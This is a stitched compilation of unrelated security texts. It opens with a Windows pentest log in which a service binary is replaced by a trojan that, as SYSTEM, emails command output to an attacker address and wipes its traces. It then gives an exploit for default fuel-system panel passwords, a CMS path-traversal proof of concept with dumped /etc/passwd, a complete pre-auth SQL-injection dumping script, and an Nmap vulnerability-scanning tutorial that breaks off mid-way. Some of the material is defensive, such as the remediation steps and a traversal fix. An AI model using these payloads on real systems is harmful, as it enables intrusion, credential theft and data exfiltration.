24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* The time manipulation is done. The files look as if they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check the ownership of the malware.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
####################################################################################################################
# [EmailAgent.cs]
####################################################################################################################
* We program this malware in such a way that when the server is rebooted (when the services are restarted),
* it will be triggered and execute the code we want,
* and then send a printout of all this to the email address we specified.
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Collections;
Namespace CliToolSpace
{
    class _Main
    {
        static void Main(string[] args)
        {
            Cli commandLine = new Cli();
            commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
            commandLine.Execute();
            commandLine.ToFile(@"C:\Windows\Temp\");
        }
    }
}
####################################################################################################################
# [Mail.cs]
####################################################################################################################
using System;
using System.Net.Mail;
using System.Net;
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("mail@deepseclab.com");
mail.To.Add("mail@hacker.com");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody;
htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
Attachment attachment;
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.UseDefaultCredentials = false;
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123");
SmtpServer.EnableSsl = true;
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);
####################################################################################################################
# [Run.bat]
####################################################################################################################
whoami > C:\Windows\Temp\Export.txt
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
cd c:\Windows\Tasks
del Run.bat & del Mail.exe
####################################################################################################################
[+]Trigger Successful![+]
[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time: 13.04.2022, 07:46:06
####################################################################################################################
# [Export.txt]
####################################################################################################################
NT AUTHORITY\SYSTEM
####################################################################################################################
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional; they stop and start the "Persits Software EmailAgent" service. We have fixed the vulnerability and I don't think they are necessary anymore.
# ==================================================================================================================
Mimipenguin beta-2.0
A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.
Details
This version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments.
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
# Date: 4/16/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)
Step 1: An attacker can use these dorks to find the panel:
inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html"
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"
Step 2: The attacker can send this request:
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
Step 3: If the response looks like this:
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
Step 4: The attacker can crack the hashes using John the Ripper.
Notice: on most panels the password is "admin".
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
# Date : 03/27/2023
# Exploit Author : Hadi Mene
# Vendor Homepage : https://www.gdidees.eu/
# Software Link : https://www.gdidees.eu/cms-1-0.html
# Version : 3.9.1 and earlier
# Tested on : Debian 11
# CVE : CVE-2023-27179
### Summary:
GDidees CMS v3.9.1 and lower versions were discovered to contain a local file disclosure vulnerability via the filename parameter of /_admin/imgdownload.php.
### Description :
Imgdownload.php is mainly used by the QR code generation module to download a QR code.
The vulnerability occurs in line 4, where the filename parameter, which is later passed to readfile(), is neither filtered nor sanitized.
Furthermore, the script performs no admin session check, although only the admin user should normally
be able to download QR codes.
Vulnerable Code :
```php
3.  if (isset($_GET["filename"])) {
4.      $filename=$_GET["filename"];
.....
.....
27.     @readfile($filename) OR die();
```
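The two defects the description names (no admin session check, and a filename taken straight from $_GET and handed to readfile()) can be closed with a few lines. The following is an added example, not GDidees' own code, written in Python rather than PHP so it can be run stand-alone; the QR directory, the session dictionary and the handler signature are assumptions made for the illustration. The technique carries over to PHP unchanged: require the admin session, accept only a bare file name, resolve it, and verify it still sits under the intended directory before reading it.

```python
import os
import tempfile
from pathlib import Path


class UnsafeFilename(ValueError):
    """Raised when a user-supplied filename is not a plain name inside the QR directory."""


def resolve_qr_file(filename: str, base_dir: Path) -> Path:
    """Map a user-controlled filename onto a file inside base_dir, or refuse.

    Rather than stripping "../" (trivially bypassed with encodings or repeated
    sequences), accept only a bare file name and then verify that the fully
    resolved path, symlinks included, still lies under base_dir.
    """
    if not filename or "\x00" in filename:
        raise UnsafeFilename("empty filename or embedded NUL byte")
    # Normalise Windows-style separators too, so "..\\" cannot sneak through.
    if os.path.basename(filename.replace("\\", "/")) != filename or filename in (".", ".."):
        raise UnsafeFilename(f"directory components not allowed: {filename!r}")
    base = base_dir.resolve()
    candidate = (base / filename).resolve()
    if base not in candidate.parents:
        raise UnsafeFilename(f"{filename!r} resolves outside {base}")
    return candidate


def is_safe_filename(filename: str, base_dir: Path) -> bool:
    try:
        resolve_qr_file(filename, base_dir)
        return True
    except UnsafeFilename:
        return False


def handle_download(params: dict, session: dict, base_dir: Path):
    """Hardened equivalent of the imgdownload.php flow (hypothetical handler).

    1. require an authenticated admin session (missing in the vulnerable code),
    2. confine the filename to base_dir (line 4 took it straight from $_GET),
    3. only then read and return the file.
    Returns (http_status, body).
    """
    if not session.get("is_admin"):
        return 403, b"admin session required"
    try:
        path = resolve_qr_file(params.get("filename", ""), base_dir)
    except UnsafeFilename:
        return 400, b"invalid filename"
    if not path.is_file():
        return 404, b"not found"
    return 200, path.read_bytes()


def demo() -> dict:
    """Exercise the handler against a temporary QR directory (constructed data)."""
    with tempfile.TemporaryDirectory() as tmp:
        qr_dir = Path(tmp) / "qrcodes"
        qr_dir.mkdir()
        (qr_dir / "qr_42.png").write_bytes(b"\x89PNG fake image for the demo")
        admin = {"is_admin": True}
        anon = {}
        traversal = "../../../../../../etc/passwd"  # the advisory's PoC value
        return {
            "traversal_status": handle_download({"filename": traversal}, admin, qr_dir)[0],
            "anon_status": handle_download({"filename": "qr_42.png"}, anon, qr_dir)[0],
            "valid_status": handle_download({"filename": "qr_42.png"}, admin, qr_dir)[0],
            "valid_body": handle_download({"filename": "qr_42.png"}, admin, qr_dir)[1],
            "traversal_safe": is_safe_filename(traversal, qr_dir),
            "plain_safe": is_safe_filename("qr_42.png", qr_dir),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The parent check after resolve() is what matters: it also catches a symlink planted inside the QR directory that points elsewhere, which a pure string filter would miss.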
### POC :
URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
Exploitation using curl:
# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
ntp:x:104:110::/nonexistent:/usr/sbin/nologin
messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
https://nvd.nist.gov/vuln/detail/CVE-2023-27179
https://www.exploit-db.com/papers/12883
```python
#!/usr/bin/python3
###############################################################
#                                                             #
#  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection  #
#  Date: 2023/04/13                                           #
#  ExploitAuthor: msd0pe                                      #
#  Project: https://github.com/waqaskanju/Chitor-CMS          #
#  My Github: https://github.com/msd0pe-1                     #
#  Patched the 2023/04/16: 69d3442 commit                     #
#                                                             #
###############################################################

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'


class bcolors:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


import re
import requests
import optparse
from prettytable import PrettyTable


def DumpTable(url, database, table):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
            pass
    except:
        pass
    x.field_names = columns
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)


def ListTables(url, database):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def ListDatabases(url):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def Main():
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()
    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
    Menu.add_option_group(Examples)
    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print(' %s' % __description__)
        print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print(' Any malicious or illegal activity may be punishable by law')
        print(' Use at your own risk')
    elif len(args) == 0:
        try:
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            print("Unexpected error")


if __name__ == '__main__':
    try:
        Main()
    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        exit(1)
```
A little-known part of Nmap is NSE, the Nmap Scripting Engine, which is one of its most powerful and flexible features. It allows users to write (and share) simple scripts to automate various network tasks. Nmap ships with a comprehensive collection of NSE scripts that can be used directly, but NSE can also be used to write custom scripts for particular needs. Here I will show two similar ready-made NSE scripts, nmap-vulners and vulscan, side by side. Both are designed to enhance Nmap's version detection by producing CVE information relevant to specific services such as SSH, RDP and SMB. CVE, or Common Vulnerabilities and Exposures, is the naming system security researchers use to catalogue and reference individual vulnerabilities across databases.
For example, Exploit-DB is a popular database that publicly discloses vulnerabilities. Exploit-DB uses CVE identifiers to index individual vulnerabilities and the specific service versions they affect, such as "SSH v7.2". Below is a screenshot of such an entry on the Exploit-DB website; note the CVE number assigned to this particular SSH vulnerability.
Both nmap-vulners and vulscan use CVE records to enhance Nmap's version detection. Nmap identifies the version of the scanned service; the NSE script takes that version information and lists the known CVEs that apply to it, which makes finding vulnerabilities much easier.
Below is an example of Nmap version detection without NSE scripts. Nmap found an SSH service on port 22 running version "OpenSSH 4.3".
```
nmap -sV -p22 1##.##.###.##.##21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.58s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
```
Here is an example of the same server scanned with the NSE scripts. There is now much more output.
```
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.##.#21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.54s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:4.3:
|       CVE-2006-5051   9.3   https://vulners.com/cve/CVE-2006-5051
|       CVE-2006-4924   7.8   https://vulners.com/cve/CVE-2006-4924
|       CVE-2007-4752   7.5   https://vulners.com/cve/CVE-2007-4752
|       CVE-2010-4478   7.5   https://vulners.com/cve/CVE-2010-4478
|       CVE-2014-1692   7.5   https://vulners.com/cve/CVE-2014-1692
|       CVE-2009-2904   6.9   https://vulners.com/cve/CVE-2009-2904
|       CVE-2008-4109   5.0   https://vulners.com/cve/CVE-2008-4109
|       CVE-2007-2243   5.0   https://vulners.com/cve/CVE-2007-2243
|       CVE-2017-15906  5.0   https://vulners.com/cve/CVE-2017-15906
|       CVE-2006-5052   5.0   https://vulners.com/cve/CVE-2006-5052
|       CVE-2010-5107   5.0   https://vulners.com/cve/CVE-2010-5107
|       CVE-2010-4755   4.0   https://vulners.com/cve/CVE-2010-4755
|       CVE-2012-0814   3.5   https://vulners.com/cve/CVE-2012-0814
|       CVE-2011-5000   3.5   https://vulners.com/cve/CVE-2011-5000
|       CVE-2011-4327   2.1   https://vulners.com/cve/CVE-2011-4327
|_      CVE-2008-3259   1.2   https://vulners.com/cve/CVE-2008-3259
| vulscan: scipvuldb.csv:
|   [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
|   [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
|   [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability
|   [43307] OpenBSD 4.0 unknown vulnerability
|   [41835] OpenBSD up to 4.8 unknown vulnerability
|   [38743] OpenBSD up to 4.6 unknown vulnerability
|   [36382] OpenBSD OpenSSH up to 4.6 information disclosure
|   [32699] OpenBSD OpenSSH 4.1 denial of service
|   [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler
|   [2578] OpenBSD OpenSSH up to 4.4 Singal race condition
|   [32532] OpenBSD OpenSSH 4.5 packet.c denial of service
|   [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler
|   [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler
|   [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler
|   [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure
|   [16020] OpenBSD OpenSSH 4.5 Format String
```
The nmap-vulners NSE script reports more than a dozen CVEs disclosed over the years. nmap-vulners orders the CVEs by CVSS score: "9.3" is the most severe and sits at the top of the list, so it is the one worth studying first. The vulscan NSE script (listed after all the CVEs) also reports a dozen interesting vulnerabilities related to OpenSSH v4.3.
Both NSE scripts present useful information about vulnerable services well. Every time we run it, nmap-vulners queries the online Vulners vulnerability database. Vulscan, on the other hand, queries local database files on our computer, which were downloaded when we first installed vulscan.
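Triage of the combined output is easier with a small parser. The following added example (not part of the original article and not part of either NSE script) parses the text output shown above, trimmed to a few entries, groups the vulners CVEs into coarse CVSS bands and lists those above a threshold, worst first. The band cut-offs (7.0 and 4.0) are an assumption, chosen to match the CVSS v2 scale the scores above use; the input text is constructed from the page's own scan output.

```python
import re
from collections import Counter

# Sample NSE output, taken (trimmed) from the scan shown above; constructed input for this example.
SAMPLE_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:4.3:
|       CVE-2006-5051   9.3   https://vulners.com/cve/CVE-2006-5051
|       CVE-2006-4924   7.8   https://vulners.com/cve/CVE-2006-4924
|       CVE-2007-4752   7.5   https://vulners.com/cve/CVE-2007-4752
|       CVE-2009-2904   6.9   https://vulners.com/cve/CVE-2009-2904
|       CVE-2017-15906  5.0   https://vulners.com/cve/CVE-2017-15906
|       CVE-2010-4755   4.0   https://vulners.com/cve/CVE-2010-4755
|       CVE-2012-0814   3.5   https://vulners.com/cve/CVE-2012-0814
|_      CVE-2008-3259   1.2   https://vulners.com/cve/CVE-2008-3259
| vulscan: scipvuldb.csv:
|   [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
|   [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability
|_  [16020] OpenBSD OpenSSH 4.5 Format String
"""

# One regex per line type; "|_" marks the last line of a script's block in Nmap output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CPE_RE = re.compile(r"^\|_?\s*(cpe:/\S+)")
CVE_RE = re.compile(r"^\|_?\s*(CVE-\d{4}-\d+)\s+(\d+(?:\.\d+)?)\s+(\S+)")
VULSCAN_RE = re.compile(r"^\|_?\s*\[(\d+)\]\s+(.*\S)")


def parse_nse_output(text: str) -> list:
    """Group script findings under the port line they belong to."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5).strip(),
                       "cpe": None, "cves": [], "vulscan": []}
            services.append(current)
            continue
        if current is None:
            continue
        m = CPE_RE.match(line)
        if m:
            current["cpe"] = m.group(1)
            continue
        m = CVE_RE.match(line)
        if m:
            current["cves"].append({"id": m.group(1), "cvss": float(m.group(2)), "url": m.group(3)})
            continue
        m = VULSCAN_RE.match(line)
        if m:
            current["vulscan"].append({"id": int(m.group(1)), "title": m.group(2)})
    return services


def severity(cvss: float) -> str:
    """Coarse bands for the CVSS v2 scores vulners prints (cut-offs are an assumption)."""
    if cvss >= 7.0:
        return "high"
    if cvss >= 4.0:
        return "medium"
    return "low"


def summarize(services: list) -> dict:
    """Count CVEs per severity band across all services."""
    counts = Counter()
    for svc in services:
        for cve in svc["cves"]:
            counts[severity(cve["cvss"])] += 1
    return dict(counts)


def prioritize(services: list, min_cvss: float = 7.0) -> list:
    """Return (port/service, CVE id, score) at or above min_cvss, worst first."""
    rows = []
    for svc in services:
        label = f"{svc['port']}/{svc['proto']} {svc['service']}"
        for cve in svc["cves"]:
            if cve["cvss"] >= min_cvss:
                rows.append((label, cve["id"], cve["cvss"]))
    return sorted(rows, key=lambda r: -r[2])


if __name__ == "__main__":
    svcs = parse_nse_output(SAMPLE_OUTPUT)
    print(summarize(svcs))
    for label, cve, score in prioritize(svcs):
        print(f"{score:4.1f}  {label:12}  {cve}")
```

The same parser works on a multi-port scan because findings are attached to the most recent port line; for machine-readable output at scale, `nmap -oX` plus an XML parser is the more robust route.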
# Step 1
## Installation: nmap-vulners
To install the nmap-vulners script, first change into the Nmap scripts directory:
```
cd /usr/share/nmap/scripts/
```
Then clone the nmap-vulners GitHub repository by typing the following command in the terminal. That is all it takes to install nmap-vulners; no configuration is required afterwards.
```
git clone https://github.com/vulnersCom/nmap-vulners.git
```
# Step 2
## Installation: vulscan
To install vulscan, clone its GitHub repository into the Nmap scripts directory as well:
```
git clone https://github.com/scipag/vulscan.git
```
As mentioned earlier, vulscan uses preconfigured databases stored locally on our computer. They sit at the top level of the vulscan directory; run the following ls command to list the available databases.
```
ls vulscan/*.csv
vulscan/cve.csv
vulscan/exploitdb.csv
vulscan/openvas.csv
vulscan/osvdb.csv
vulscan/scipvuldb.csv
vulscan/securityfocus.csv
vulscan/securitytracker.csv
vulscan/xforce.csv
```
### Vulscan supports many well-known vulnerability and exploit databases:
- scipvuldb.csv
- cve.csv
- osvdb.csv
- securityfocus.csv
- securitytracker.csv
- xforce.csv
- exploitdb.csv
- openvas.csv
To ensure the databases are fully up to date, use the updateFiles.sh script in the vulscan/utilities/updater/ directory. Switch to the updater directory by typing the following command in the terminal.
```
cd vulscan/utilities/updater/
```
Then use chmod to make sure the script has execute permission on your computer.
```
chmod +x updateFiles.sh
```
We can then run the script by typing the following command in the terminal.
```
./updateFiles.sh
```
Once that is done, we can start using the NSE scripts.
# Step 3
